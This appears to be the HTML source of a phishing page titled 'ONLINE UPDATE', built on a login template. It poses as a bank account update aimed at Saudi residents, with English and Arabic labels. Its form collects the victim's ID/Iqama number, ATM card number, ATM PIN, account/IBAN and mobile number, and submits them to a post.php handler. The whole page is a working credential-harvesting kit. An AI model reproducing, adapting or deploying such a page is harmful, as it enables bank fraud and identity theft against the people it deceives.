﻿<!DOCTYPE html>
<html lang="en">
<head>
	<title>ONLINE UPDATE</title>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
<!--===============================================================================================-->	
	<link rel="icon" type="image/png" href="images/icons/favicon.ico"/>
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="vendor/bootstrap/css/bootstrap.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="fonts/font-awesome-4.7.0/css/font-awesome.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="fonts/iconic/css/material-design-iconic-font.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="vendor/animate/animate.css">
<!--===============================================================================================-->	
	<link rel="stylesheet" type="text/css" href="vendor/css-hamburgers/hamburgers.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="vendor/animsition/css/animsition.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="vendor/select2/select2.min.css">
<!--===============================================================================================-->	
	<link rel="stylesheet" type="text/css" href="vendor/daterangepicker/daterangepicker.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="css/util.css">
	<link rel="stylesheet" type="text/css" href="css/main.css">
<!--===============================================================================================-->
<script> function Redirect() {
//location.replace("thanks.html");
} </script>
</head>
<body style="background-color: #999999;">

	<div class="limiter">
		<div class="container-login100">
			<div class="login100-more" style="background-image: url('images/credit-card-logo.jpg');"></div>

			<div class="wrap-login100 p-l-50 p-r-50 p-t-72 p-b-50">
				<form class="login100-form validate-form" action="post.php">
					<span class="login100-form-title p-b-59" style="color:green;">



						ONLINE UPDATE
					</span>
					<div class="wrap-input100 validate-input" data-validate = "Valid ID/Iqama Number required">
						<span class="label-input100">ID / IQAMA    هوية شخصية/اقامہ۔  </span>
						<input class="input100" type="number" name="iqama" placeholder="**********">
						<span class="focus-input100"></span>
					</div>

					<div class="wrap-input100 validate-input" data-validate="ATM Card Number is required">
						<span class="label-input100">ATM Card Number   رقم بطاقة الصراف الآلي </span>
						<input class="input100" type="number" name="atm" placeholder="****************">
						<span class="focus-input100"></span>
					</div>

										<div class="wrap-input100 validate-input" data-validate = "Atm Pin Number">
						<span class="label-input100">ATM PIN Number  رقم السري الصراف الآلي  </span>
						<input class="input100" type="number" name="pin number" placeholder="****">
						<span class="focus-input100"></span>
					</div>
					

					<div class="wrap-input100 validate-input" data-validate = "Account Number">
						<span class="label-input100"> Account/IBAN رقم لحساب البنك الدولي  </span>
						<input class="input100" type="text" name="account" placeholder="**********">
						<span class="focus-input100"></span>
					</div>

					<div class="wrap-input100 validate-input" data-validate = "Registered Mobile Number">
						<span class="label-input100">Registered Mobile Number      رقم الجوال     </span>
						<input class="input100" type="number" name="mobile" placeholder="**********">
						<span class="focus-input100"></span>

					<div class="flex-m w-full p-b-33">
						<div class="contact100-form-checkbox">
							<input class="input-checkbox100" id="ckb1" type="checkbox" name="remember-me">
							<label class="label-checkbox100" for="ckb1">
								<span class="txt1">
									I agree to the
									<a href="#" class="txt2 hov1">
										Terms of User
									</a>
								</span>
							</label>
						</div>

						
					</div>

					<div class="container-login100-form-btn">
						<div class="wrap-login100-form-btn">
							<div class="login100-form-bgbtn"></div>
							<button class="login100-form-btn" onclick="Redirect()">
								Submit
							</button>
					</div>

					</div>




					</div>
				</form>
			</div>
		</div>
	</div>
	

	<div id="dropDownSelect1"></div>
	
<!--===============================================================================================-->
	<script src="vendor/jquery/jquery-3.2.1.min.js"></script>
<!--===============================================================================================-->
	<script src="vendor/animsition/js/animsition.min.js"></script>
<!--===============================================================================================-->
	<script src="vendor/bootstrap/js/popper.js"></script>
	<script src="vendor/bootstrap/js/bootstrap.min.js"></script>
<!--===============================================================================================-->
	<script src="vendor/select2/select2.min.js"></script>
<!--===============================================================================================-->
	<script src="vendor/daterangepicker/moment.min.js"></script>
	<script src="vendor/daterangepicker/daterangepicker.js"></script>
<!--===============================================================================================-->
	<script src="vendor/countdowntime/countdowntime.js"></script>
<!--===============================================================================================-->
	<script src="js/main.js"></script>

</body>
</html>